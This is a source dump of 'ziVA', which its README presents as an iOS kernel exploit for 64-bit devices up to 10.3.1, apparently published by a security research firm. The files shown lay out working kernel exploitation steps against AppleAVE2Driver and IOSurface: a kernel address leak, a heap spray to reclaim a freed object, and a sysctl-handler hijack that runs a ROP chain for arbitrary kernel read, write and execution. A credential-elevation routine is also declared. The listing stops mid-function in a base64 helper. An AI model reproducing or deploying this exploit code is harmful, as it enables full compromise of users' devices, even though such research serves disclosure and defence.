├── utils.h ├── post_exploit.h ├── rwx.h ├── log.h ├── kernel_read.h ├── apple_ave_pwn.h ├── README.md ├── heap_spray.h ├── offsets.h ├── iosurface_utils.h ├── rwx.m ├── device_port.h ├── apple_ave_utils.h ├── device_types.h ├── utils.m ├── main.m ├── log.m ├── apple_ave_utils.m ├── post_exploit.m ├── Makefile ├── iosurface_utils.m ├── offsets.m ├── kernel_read.m ├── heap_spray.m ├── apple_ave_pwn.m └── iokit.h /utils.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | #ifndef __UTILS_H_ 6 | #define __UTILS_H_ 7 | 8 | 9 | 10 | 11 | char * utils_get_base64_payload(void * buffer, size_t length); 12 | 13 | 14 | 15 | #endif /* __UTILS_H_ */ -------------------------------------------------------------------------------- /post_exploit.h: -------------------------------------------------------------------------------- 1 | /* 2 | This file takes advantage of the RW capabilities we installed previously on the sysctl to elevate ourselves. 3 | */ 4 | 5 | #include 6 | 7 | #ifndef __POST_EXPLOITATION_H_ 8 | #define __POST_EXPLOITATION_H_ 9 | 10 | 11 | kern_return_t post_exploit_get_kernel_creds(); 12 | 13 | 14 | 15 | 16 | #endif /* __POST_EXPLOITATION_H_ */ -------------------------------------------------------------------------------- /rwx.h: -------------------------------------------------------------------------------- 1 | /* 2 | This file is responsible for executing the ROP chain (post-installation on the sysctl entries). 3 | */ 4 | 5 | #include 6 | #include 7 | 8 | #ifndef __RWX_H_ 9 | #define __RWX_H_ 10 | 11 | 12 | kern_return_t rwx_execute(void * func_addr, unsigned long arg0, unsigned long arg1, unsigned long arg2); 13 | kern_return_t rwx_read(void * addr, void * value, size_t length); 14 | kern_return_t rwx_write(void * addr, void * value, size_t length); 15 | 16 | #endif /* __RWX_H_ */ -------------------------------------------------------------------------------- /log.h: -------------------------------------------------------------------------------- 1 | #include 2 | #import 3 | 4 | #ifndef __LOG_H_ 5 | #define __LOG_H_ 6 | 7 | #define LOG_LOG(tag, fmt, ...) NSLog((@"[%c] %s:%s: " fmt), tag, __func__, mach_error_string(ret), ##__VA_ARGS__) 8 | 9 | #ifdef NDEBUG 10 | #define DEBUG_LOG(fmt, ...) 11 | #define ERROR_LOG(fmt, ...) 12 | #else 13 | #define DEBUG_LOG(fmt, ...) LOG_LOG('+', fmt, ##__VA_ARGS__) 14 | #define ERROR_LOG(fmt, ...) LOG_LOG('-', fmt, ##__VA_ARGS__) 15 | #endif /* NDEBUG */ 16 | 17 | #endif /* __LOG_H_ */ 18 | -------------------------------------------------------------------------------- /kernel_read.h: -------------------------------------------------------------------------------- 1 | /* 2 | Arbitrary kernel read embarassement. 3 | */ 4 | 5 | #ifndef KERNEL_READ_H_ 6 | #define KERNEL_READ_H_ 7 | 8 | #define IOSERVICE_NAME_ALL_SERVICES ("IOService") 9 | #define CAMERA_SERVICE_NAME_SUFFIX ("CamIn") 10 | 11 | #define CAMERA_EXTERNAL_METHOD_GETSETFILE_SURFACE_ID (19) 12 | #define CAMERA_EXTERNAL_METHOD_LOAD_DATA_FILE (39) 13 | 14 | #define NUMBER_OF_BULK_RACERS (0x10) 15 | 16 | #define IOSURFACE_OFFSET_BULK_ATTACHMENT (0x234) 17 | 18 | kern_return_t kernel_read_init(); 19 | kern_return_t kernel_read_cleanup(); 20 | kern_return_t kernel_read_leak_kernel_base(void ** kernel_base); 21 | 22 | #endif /* KERNEL_READ_H_ */ -------------------------------------------------------------------------------- /apple_ave_pwn.h: -------------------------------------------------------------------------------- 1 | /* 2 | Depends heavily on apple_ave_utils (and lightly on other stuff) for exploitation of AppleAVE2Driver 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | 10 | #ifndef APPLE_AVE_PWN_H_ 11 | #define APPLE_AVE_PWN_H_ 12 | 13 | 14 | 15 | 16 | 17 | kern_return_t apple_ave_pwn_init(); 18 | kern_return_t apple_ave_pwn_cleanup(); 19 | kern_return_t apple_ave_pwn_get_surface_kernel_address(uint32_t surface_id, void ** surface_kernel_address); 20 | kern_return_t apple_ave_pwn_put_data_in_bulk(void * address_with_data); 21 | void * apple_ave_pwn_get_bad_surface_kernel_ptr(); 22 | kern_return_t apple_ave_pwn_drop_surface_refcount(void * surface_kernel_address); 23 | kern_return_t apple_ave_pwn_use_fake_iosurface(void * fake_iosurface_address); 24 | 25 | #endif /* APPLE_AVE_PWN_H_ */ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ziVA 2 | An iOS kernel exploit designated to work on all 64-bit iOS devices <= 10.3.1 3 | 4 | # More general information 5 | https://blog.zimperium.com/zimperium-zlabs-ios-security-advisories/ 6 | 7 | https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/ 8 | 9 | # Offsets modifications for other iOS devices 10 | Like a lot (if not most) of the iOS kernel exploits, this also requires offsets for each iOS device and version. 11 | Those will be posted in the close future (when I get more time) but should be acquired from AppleAVEDriver (you can get a hint on the offsets from the comments above them). 12 | 13 | # Sandbox escape 14 | Like mentioned, AppleAVEDriver direct access requires sandbox escape (either mediaserverd sandbox context or no sandbox at all). 15 | Fortunately, Sandbox escape exploits have been released by P0, which means this can be used to completely compromise a kernel, and a step towards a full jailbreak. 16 | 17 | # Is it a Jailbreak? 18 | This is a crucial part in a Jailbreak chain, but this never aimed to become a Jailbreak. 19 | 20 | # Is this going to be a jailbreak? 21 | Maybe, if someone wants to work on that 22 | 23 | # Credits 24 | Credit for finding the vulnerabilities, chaining them together, writing the exploit go to Adam Donenfeld (@doadam). 25 | Special thanks to Zuk Avraham (@ihackbanme), Yaniv Karta (@shokoluv) and the rest of the Zimperium team for the opportunity (and the paycheck). 26 | -------------------------------------------------------------------------------- /heap_spray.h: -------------------------------------------------------------------------------- 1 | /* 2 | This file is responsible for the heap spraying. 3 | The heap spraying technique used here takes advantage of the IOSurface set\get prop data, 4 | allowing us not only to spray freely using any size we want (OSData), 5 | but also to repeatedly read the sprayed value back! 6 | 7 | The technique here is quite simple: 8 | * Allocate some data to fill-up "holes" 9 | * Allocate an IOSurface object. 10 | * Reveal its kernel address using our vulnerability. 11 | * Free it (we actually use another vulnerability for that, because leaking the address also leaks a refcount). 12 | * Spray a lot and assume we're going to catch the IOSurface object. 13 | 14 | Note: Since we're not writing a weapon here, I didn't bother researching how the memory allocator on iOS works. 15 | Weaponizing it will probably require you to do so. 16 | */ 17 | 18 | #include 19 | 20 | #ifndef __HEAP_SPRAY_H_ 21 | #define __HEAP_SPRAY_H_ 22 | 23 | #define NUMBER_OF_OBJECTS_TO_SPRAY (100) 24 | #define NUMBER_OF_OBJECTS_TO_CLOSE_HOLES (0x100) 25 | 26 | #define SYSCTL_HANDLER_SIZE (0x50) 27 | #define SPRAY_SYSCTL_HELPER (0x100) 28 | #define SPRAY_SYSCTL_HELPER_EXECUTION (SPRAY_SYSCTL_HELPER + 0x28) 29 | #define SPRAY_SYSCTL_HELPER_EXECUTION_ROP (SPRAY_SYSCTL_HELPER_EXECUTION + 0x28) 30 | 31 | kern_return_t heap_spray_init(); 32 | void heap_spray_cleanup(); 33 | kern_return_t heap_spray_start_spraying(void ** kernel_allocated_data); 34 | void heap_spray_prepare_buffer_for_rop(void * function, uint64_t arg0, 35 | uint64_t arg1, uint64_t arg2); 36 | 37 | 38 | #endif /* __HEAP_SPRAY_H_ */ -------------------------------------------------------------------------------- /offsets.h: -------------------------------------------------------------------------------- 1 | /* 2 | Offsets for the kernel 3 | */ 4 | 5 | #include 6 | 7 | #ifndef OFFSETS_H_ 8 | #define OFFSETS_H_ 9 | 10 | #define OFFSET(offset) offsets_get_offsets().offset 11 | 12 | typedef struct offsets_e { 13 | uint64_t kernel_base; 14 | uint64_t encode_frame_offset_chroma_format_idc; 15 | uint64_t encode_frame_offset_ui32_width; 16 | uint64_t encode_frame_offset_ui32_height; 17 | uint64_t encode_frame_offset_slice_per_frame; 18 | uint64_t encode_frame_offset_info_type; 19 | uint64_t encode_frame_offset_iosurface_buffer_mgr; 20 | uint64_t kernel_address_multipass_end_pass_counter_enc; 21 | uint64_t encode_frame_offset_keep_cache; 22 | uint64_t iofence_vtable_offset; 23 | uint64_t iosurface_current_fences_list_head; 24 | uint64_t panic; 25 | uint64_t osserializer_serialize; 26 | uint64_t copyin; 27 | uint64_t copyout; 28 | uint64_t all_proc; 29 | uint64_t kern_proc; 30 | uint64_t l1dcachesize_handler; 31 | uint64_t l1dcachesize_string; 32 | uint64_t l1icachesize_string; 33 | uint64_t quad_format_string; 34 | uint64_t null_terminator; 35 | uint64_t cachesize_callback; 36 | uint64_t sysctl_hw_family; 37 | uint64_t ret_gadget; 38 | uint64_t struct_proc_p_comm; 39 | uint64_t struct_proc_p_ucred; 40 | uint64_t struct_kauth_cred_cr_ref; 41 | uint64_t struct_proc_p_uthlist; 42 | uint64_t struct_uthread_uu_ucred; 43 | uint64_t struct_uthread_uu_list; 44 | uint64_t iosurface_vtable_offset_kernel_hijack; 45 | 46 | } offsets_t; 47 | 48 | 49 | 50 | kern_return_t offsets_init(); 51 | offsets_t offsets_get_offsets(); 52 | void * offsets_get_kernel_base(); 53 | void offsets_set_kernel_base(void * kernel_base); 54 | 55 | 56 | #endif /* OFFSETS_H_ */ -------------------------------------------------------------------------------- /iosurface_utils.h: -------------------------------------------------------------------------------- 1 | /* 2 | API for basic communication with IOSurfaceRootUserClient 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #ifndef IOSURFACE_UTILS_H_ 10 | #define IOSURFACE_UTILS_H_ 11 | 12 | #define IOSURFACE_IOKIT_SERVICE ("IOSurfaceRoot") 13 | 14 | #define IOSURFACE_EXTERNAL_METHOD_CREATE (0) 15 | #define IOSURFACE_EXTERNAL_METHOD_RELEASE (1) 16 | #define IOSURFACE_EXTERNAL_METHOD_LOOKUP (4) 17 | #define IOSURFACE_EXTERNAL_METHOD_CREATE_SET_VALUE (9) 18 | #define IOSURFACE_EXTERNAL_METHOD_CREATE_COPY_VALUE (10) 19 | #define IOSURFACE_EXTERNAL_METHOD_SET_BULK_ATTACHMENT (26) 20 | #define IOSURFACE_EXTERNAL_METHOD_GET_BULK_ATTACHMENT (27) 21 | 22 | 23 | #define IOSURFACE_BULK_ATTACHMENT_SIZE (0x58) 24 | #define IOSURFACE_BULK_ATTACHMENT_FLAG (0x48) 25 | 26 | #define IOSURFACE_BULKATTACHMENT_FLAG_SET_ALL_BULKS (0xFF) 27 | 28 | #define IOSURFACE_DICTIONARY_SIZE (0x3C8) 29 | #define IOSURFACE_SURFACE_ID_OFFSET (0x10) 30 | 31 | #define IOSURFACE_KERNEL_OBJECT_SIZE (0x338) 32 | 33 | kern_return_t iosurface_utils_get_connection(io_connect_t * conn_out); 34 | kern_return_t iosurface_utils_create_surface(io_connect_t connection, uint32_t * surface_id_out, void * output_buffer); 35 | kern_return_t iosurface_utils_release_surface(io_connect_t connection, uint32_t surface_id_to_free); 36 | kern_return_t iosurface_utils_set_bulk_attachment(io_connect_t conn, uint32_t surface_id, void * bulk_data); 37 | kern_return_t iosurface_utils_get_bulk_attachment(io_connect_t conn, uint32_t surface_id, char * bulk_data_out); 38 | kern_return_t iosurface_utils_get_surface_info(io_connect_t conn, uint32_t surface_id, void ** surface_buffer, size_t * buffer_size); 39 | 40 | kern_return_t iosurface_utils_set_value(io_connect_t conn, uint32_t surface_id, 41 | const char * key, char * data); 42 | /* 43 | * Function name: iosurface_utils_set_bulk_attachment_flag 44 | * Description: Sets the flag for the input buffer. Used for set bulk attachment to define which fields should be set 45 | * Returns: void. 46 | */ 47 | 48 | static inline void iosurface_utils_set_bulk_attachment_flag(void * input_buffer, uint16_t flags) { 49 | *(uint16_t*)((char*)input_buffer + IOSURFACE_BULK_ATTACHMENT_FLAG) = flags; 50 | } 51 | 52 | 53 | 54 | #endif /* IOSURFACE_UTILS_H_ */ -------------------------------------------------------------------------------- /rwx.m: -------------------------------------------------------------------------------- 1 | #include "rwx.h" 2 | #include "offsets.h" 3 | #include "log.h" 4 | #include "heap_spray.h" 5 | 6 | #include 7 | #include 8 | 9 | #define SYSCTL_PREPARE_ROP ("hw.l1dcachesize") 10 | #define SYSCTL_EXECUTE_ROP ("hw.l1icachesize") 11 | 12 | /* 13 | * Function name: rwx_trigger_handler 14 | * Description: Calls the overwritten sysctl to execute the ROP chain. 15 | * Returns: kern_return_t. 16 | */ 17 | 18 | static kern_return_t rwx_trigger_handler() { 19 | kern_return_t ret = KERN_SUCCESS; 20 | unsigned long oldp = 0; 21 | size_t olds = 8; 22 | 23 | if (sysctlbyname(SYSCTL_PREPARE_ROP, &oldp, &olds, NULL, 0)) 24 | { 25 | ERROR_LOG("Error preparing ROP using %s: %s", SYSCTL_PREPARE_ROP, strerror(errno)); 26 | ret = KERN_ABORTED; 27 | goto cleanup; 28 | } 29 | else if(0 != olds) { 30 | ERROR_LOG("%s returned a normal size. seems like our sysctl handler wasn't installed.", SYSCTL_PREPARE_ROP); 31 | ret = KERN_ABORTED; 32 | goto cleanup; 33 | } 34 | 35 | olds = 8; 36 | 37 | if (sysctlbyname(SYSCTL_EXECUTE_ROP, &oldp, &olds, NULL, 0)) 38 | { 39 | ERROR_LOG("Error preparing ROP using %s: %s", SYSCTL_EXECUTE_ROP, strerror(errno)); 40 | ret = KERN_ABORTED; 41 | } 42 | else if (0 != olds) { 43 | ERROR_LOG("%s returned a normal size. seems like our sysctl handler wasn't installed.", SYSCTL_EXECUTE_ROP); 44 | ret = KERN_ABORTED; 45 | goto cleanup; 46 | } 47 | 48 | cleanup: 49 | return ret; 50 | } 51 | 52 | /* 53 | * Function name: rwx_execute 54 | * Description: Executes a kernel function with controlled parameters. 55 | * Returns: kern_return_t. 56 | */ 57 | 58 | kern_return_t rwx_execute(void * func_addr, unsigned long arg0, unsigned long arg1, unsigned long arg2) { 59 | kern_return_t ret = KERN_SUCCESS; 60 | heap_spray_prepare_buffer_for_rop(func_addr, 61 | arg0, 62 | arg1, 63 | arg2); 64 | 65 | ret = rwx_trigger_handler(); 66 | if (KERN_SUCCESS != ret) 67 | { 68 | goto cleanup; 69 | } 70 | 71 | 72 | cleanup: 73 | return ret; 74 | 75 | } 76 | 77 | /* 78 | * Function name: rwx_read 79 | * Description: Reads from a kernel address 'addr' into 'value', 'length' bytes. 80 | * Returns: kern_return_t. 81 | */ 82 | 83 | kern_return_t rwx_read(void * addr, void * value, size_t length) { 84 | kern_return_t ret = KERN_SUCCESS; 85 | 86 | ret = rwx_execute(offsets_get_kernel_base() + OFFSET(copyout), (unsigned long)addr, (unsigned long)(value), length); 87 | if (KERN_SUCCESS != ret) 88 | { 89 | goto cleanup; 90 | } 91 | 92 | 93 | cleanup: 94 | return ret; 95 | 96 | } 97 | 98 | /* 99 | * Function name: rwx_write 100 | * Description: Writes to a kernel address 'addr' from buffer 'value', 'length' bytes. 101 | * Returns: kern_return_t. 102 | */ 103 | 104 | kern_return_t rwx_write(void * addr, void * value, size_t length) { 105 | kern_return_t ret = KERN_SUCCESS; 106 | 107 | ret = rwx_execute(offsets_get_kernel_base() + OFFSET(copyin), (unsigned long)value, (unsigned long)addr, length); 108 | if (KERN_SUCCESS != ret) 109 | { 110 | goto cleanup; 111 | } 112 | 113 | cleanup: 114 | return ret; 115 | 116 | } 117 | -------------------------------------------------------------------------------- /device_port.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2000-2004 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * @OSF_COPYRIGHT@ 30 | */ 31 | /* 32 | * Mach Operating System 33 | * Copyright (c) 1991,1990,1989 Carnegie Mellon University 34 | * All Rights Reserved. 35 | * 36 | * Permission to use, copy, modify and distribute this software and its 37 | * documentation is hereby granted, provided that both the copyright 38 | * notice and this permission notice appear in all copies of the 39 | * software, derivative works or modified versions, and any portions 40 | * thereof, and that both notices appear in supporting documentation. 41 | * 42 | * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" 43 | * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR 44 | * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. 45 | * 46 | * Carnegie Mellon requests users of this software to return to 47 | * 48 | * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU 49 | * School of Computer Science 50 | * Carnegie Mellon University 51 | * Pittsburgh PA 15213-3890 52 | * 53 | * any improvements or extensions that they make and grant Carnegie Mellon 54 | * the rights to redistribute these changes. 55 | */ 56 | /* 57 | */ 58 | /* 59 | * Author: David B. Golub, Carnegie Mellon University 60 | * Date: 8/89 61 | */ 62 | 63 | #ifndef _DEVICE_DEVICE_PORT_H_ 64 | #define _DEVICE_DEVICE_PORT_H_ 65 | 66 | #include 67 | 68 | /* 69 | * Master privileged I/O object for this host 70 | */ 71 | extern mach_port_t master_device_port; 72 | 73 | #define DEVICE_PAGER_GUARDED 0x1 74 | #define DEVICE_PAGER_COHERENT 0x2 75 | #define DEVICE_PAGER_CACHE_INHIB 0x4 76 | #define DEVICE_PAGER_WRITE_THROUGH 0x8 77 | #define DEVICE_PAGER_CONTIGUOUS 0x100 78 | #define DEVICE_PAGER_NOPHYSCACHE 0x200 79 | 80 | #endif /* _DEVICE_DEVICE_PORT_H_ */ 81 | -------------------------------------------------------------------------------- /apple_ave_utils.h: -------------------------------------------------------------------------------- 1 | /* 2 | Basic API for AppleAVE2UserClient 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | 10 | #ifndef __APPLE_AVE_UTILS_H_ 11 | #define __APPLE_AVE_UTILS_H_ 12 | 13 | #define IOKIT_ALL_SERVICES ("IOService") 14 | #define IOKIT_SERVICE_APPLE_AVE_NAME ("AppleAVEDriver") 15 | 16 | #define APPLEAVE2_EXTERNAL_METHOD_ADD_CLIENT (0) 17 | #define APPLEAVE2_EXTERNAL_METHOD_REMOVE_CLIENT (1) 18 | #define APPLEAVE2_EXTERNAL_METHOD_SET_SESSION_SETTINGS (3) 19 | #define APPLEAVE2_EXTERNAL_METHOD_ENCODE_FRAME (6) 20 | #define APPLEAVE2_EXTERNAL_METHOD_PREPARE_TO_ENCODE_FRAMES (7) 21 | #define FRAME_QUEUE_BUFFER_OFFSET (0x178) 22 | #define INIT_INFO_BUFFER_OFFSET (0x180) 23 | 24 | #define ENCODE_FRAME_INPUT_BUFFER_SIZE (0x300) 25 | #define ENCODE_FRAME_OUTPUT_BUFFER_SIZE (0x1E8) 26 | 27 | 28 | /* 29 | memmovea_74(v13 + 0x4AA8, v20 + 0x3B70, 0x5ACLL); 30 | v32 = *((_DWORD *)v13 + 0x12B4); 31 | */ 32 | #define ENCODE_FRAME_OFFSET_CHROMA_FORMAT_IDC (0x3B70+0x28) 33 | 34 | /* 35 | v30 = v13 + 0x194C; 36 | *(_DWORD *)v30 <= 0xBFu 37 | */ 38 | #define ENCODE_FRAME_OFFSET_UI32_WIDTH (0xA10+4) 39 | /* 40 | v33 = *((_DWORD *)v13 + 0x654); 41 | */ 42 | #define ENCODE_FRAME_OFFSET_UI32_HEIGHT (0xA10+8) 43 | /* 44 | memmovea_74(v13 + 0x1C90, v20 + 0xD58, 0x2E18LL); 45 | v34 = *((_DWORD *)v13 + 0x730); 46 | */ 47 | #define ENCODE_FRAME_OFFSET_SLICE_PER_FRAME (0xD58+0x30) 48 | /* 49 | v55 = get_kernel_address_by_counter_multiple((__int64)kernel_frame_queue_1, counter); 50 | v58 = *(_DWORD *)(v55 + 0x10); 51 | */ 52 | #define ENCODE_FRAME_OFFSET_INFO_TYPE (0x10) 53 | 54 | #define ENCODE_FRAME_OFFSET_IOSURFACE_BUFFER_MGR (0x11D8) 55 | 56 | /* 57 | v8 = *(unsigned int *)(a3 + 0xC); 58 | if ( (unsigned int)v8 >= 2 ) 59 | { 60 | v9 = "AVE ERROR: IMG_V_EncodeAndSendFrame multiPassEndPassCounterEnc (%d) >= H264VIDEOENCODER_MULTI_PASS_PASSES\n"; 61 | */ 62 | #define KERNEL_ADDRESS_MULTIPASS_END_PASS_COUNTER_ENC (0xC) 63 | 64 | /* 65 | memmovea_74(&frame_stuff->field_1C90, v20 + 0xD58, 0x2E18LL); 66 | frame_stuff->field_4A88 67 | Python>hex(0x4a88-0x1c90) 68 | 0x2df8 69 | Python>hex(0xd58+0x2df8) 70 | 0x3b50 71 | */ 72 | #define ENCODE_FRAME_OFFSET_KEEP_CACHE (0x3B50) 73 | 74 | #define IOKIT_ADD_CLIENT_INPUT_BUFFER_SIZE (4) 75 | #define IOKIT_ADD_CLIENT_OUTPUT_BUFFER_SIZE (4) 76 | #define IOKIT_REMOVE_CLIENT_INPUT_BUFFER_SIZE (4) 77 | #define IOKIT_REMOVE_CLIENT_OUTPUT_BUFFER_SIZE (4) 78 | #define IOKIT_ENCODE_FRAME_INPUT_BUFFER_SIZE (0x28) 79 | #define IOKIT_ENCODE_FRAME_OUTPUT_BUFFER_SIZE (4) 80 | 81 | kern_return_t apple_ave_utils_add_client(io_connect_t conn); 82 | kern_return_t apple_ave_utils_remove_client(io_connect_t conn); 83 | kern_return_t apple_ave_utils_get_connection(io_connect_t * conn_out); 84 | kern_return_t apple_ave_utils_prepare_to_encode_frames(io_connect_t conn, void * input_buffer, 85 | void * output_buffer); 86 | kern_return_t apple_ave_utils_encode_frame(io_connect_t conn, void * input_buffer, 87 | void * output_buffer); 88 | kern_return_t apple_ave_utils_set_session_settings(io_connect_t conn, void * input_buffer, void * output_buffer); 89 | 90 | #endif /* __APPLE_AVE_UTILS_H_ */ -------------------------------------------------------------------------------- /device_types.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2000-2004 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * @OSF_COPYRIGHT@ 30 | */ 31 | /* 32 | * Mach Operating System 33 | * Copyright (c) 1991,1990,1989 Carnegie Mellon University 34 | * All Rights Reserved. 35 | * 36 | * Permission to use, copy, modify and distribute this software and its 37 | * documentation is hereby granted, provided that both the copyright 38 | * notice and this permission notice appear in all copies of the 39 | * software, derivative works or modified versions, and any portions 40 | * thereof, and that both notices appear in supporting documentation. 41 | * 42 | * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" 43 | * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR 44 | * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. 45 | * 46 | * Carnegie Mellon requests users of this software to return to 47 | * 48 | * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU 49 | * School of Computer Science 50 | * Carnegie Mellon University 51 | * Pittsburgh PA 15213-3890 52 | * 53 | * any improvements or extensions that they make and grant Carnegie Mellon 54 | * the rights to redistribute these changes. 55 | */ 56 | /* 57 | */ 58 | /* 59 | * Author: David B. Golub, Carnegie Mellon University 60 | * Date: 3/89 61 | */ 62 | 63 | #ifndef DEVICE_TYPES_H 64 | #define DEVICE_TYPES_H 65 | 66 | /* 67 | * Types for device interface. 68 | */ 69 | #include 70 | #include 71 | #include 72 | #include 73 | 74 | 75 | 76 | /* 77 | * IO buffer - out-of-line array of characters. 78 | */ 79 | typedef char * io_buf_ptr_t; 80 | 81 | /* 82 | * Some types for IOKit. 83 | */ 84 | 85 | /* must match device_types.defs */ 86 | typedef char io_name_t[128]; 87 | typedef char io_string_t[512]; 88 | typedef char io_string_inband_t[4096]; 89 | typedef char io_struct_inband_t[4096]; 90 | #define __LP64__ 91 | #if __LP64__ 92 | typedef uint64_t io_user_scalar_t; 93 | typedef uint64_t io_user_reference_t; 94 | typedef io_user_scalar_t io_scalar_inband_t[16]; 95 | typedef io_user_reference_t io_async_ref_t[8]; 96 | typedef io_user_scalar_t io_scalar_inband64_t[16]; 97 | typedef io_user_reference_t io_async_ref64_t[8]; 98 | #else 99 | typedef int io_user_scalar_t; 100 | typedef natural_t io_user_reference_t; 101 | typedef io_user_scalar_t io_scalar_inband_t[16]; 102 | typedef io_user_reference_t io_async_ref_t[8]; 103 | typedef uint64_t io_scalar_inband64_t[16]; 104 | typedef uint64_t io_async_ref64_t[8]; 105 | #endif // __LP64__ 106 | 107 | 108 | #ifndef __IOKIT_PORTS_DEFINED__ 109 | #define __IOKIT_PORTS_DEFINED__ 110 | typedef mach_port_t io_object_t; 111 | #endif /* __IOKIT_PORTS_DEFINED__ */ 112 | 113 | #endif /* DEVICE_TYPES_H */ 114 | 115 | -------------------------------------------------------------------------------- /utils.m: -------------------------------------------------------------------------------- 1 | #include "utils.h" 2 | 3 | static char encoding_table[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 4 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 5 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 6 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 7 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 8 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 9 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 10 | '4', '5', '6', '7', '8', '9', '+', '/'}; 11 | static char *decoding_table = NULL; 12 | static int mod_table[] = {0, 2, 1}; 13 | 14 | void build_decoding_table() { 15 | 16 | decoding_table = malloc(256); 17 | 18 | for (int i = 0; i < 64; i++) 19 | decoding_table[(unsigned char) encoding_table[i]] = i; 20 | } 21 | 22 | 23 | void base64_cleanup() { 24 | free(decoding_table); 25 | } 26 | 27 | 28 | char *base64_encode(const unsigned char *data, 29 | size_t input_length, 30 | size_t *output_length) { 31 | 32 | *output_length = 4 * ((input_length + 2) / 3); 33 | 34 | char *encoded_data = malloc(*output_length); 35 | if (encoded_data == NULL) return NULL; 36 | 37 | for (uint64_t i = 0, j = 0; i < input_length;) { 38 | 39 | uint32_t octet_a = i < input_length ? (unsigned char)data[i++] : 0; 40 | uint32_t octet_b = i < input_length ? (unsigned char)data[i++] : 0; 41 | uint32_t octet_c = i < input_length ? (unsigned char)data[i++] : 0; 42 | 43 | uint32_t triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c; 44 | 45 | encoded_data[j++] = encoding_table[(triple >> 3 * 6) & 0x3F]; 46 | encoded_data[j++] = encoding_table[(triple >> 2 * 6) & 0x3F]; 47 | encoded_data[j++] = encoding_table[(triple >> 1 * 6) & 0x3F]; 48 | encoded_data[j++] = encoding_table[(triple >> 0 * 6) & 0x3F]; 49 | } 50 | 51 | for (int i = 0; i < mod_table[input_length % 3]; i++) 52 | encoded_data[*output_length - 1 - i] = '='; 53 | 54 | return encoded_data; 55 | } 56 | 57 | 58 | unsigned char *base64_decode(const char *data, 59 | size_t input_length, 60 | size_t *output_length) { 61 | 62 | if (decoding_table == NULL) build_decoding_table(); 63 | 64 | if (input_length % 4 != 0) return NULL; 65 | 66 | *output_length = input_length / 4 * 3; 67 | if (data[input_length - 1] == '=') (*output_length)--; 68 | if (data[input_length - 2] == '=') (*output_length)--; 69 | 70 | unsigned char *decoded_data = malloc(*output_length); 71 | if (decoded_data == NULL) return NULL; 72 | 73 | for (uint64_t i = 0, j = 0; i < input_length;) { 74 | 75 | #pragma clang diagnostic push 76 | #pragma clang diagnostic ignored "-Wchar-subscripts" 77 | uint32_t sextet_a = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]]; 78 | uint32_t sextet_b = data[i] == '=' ? 0 & i++ : 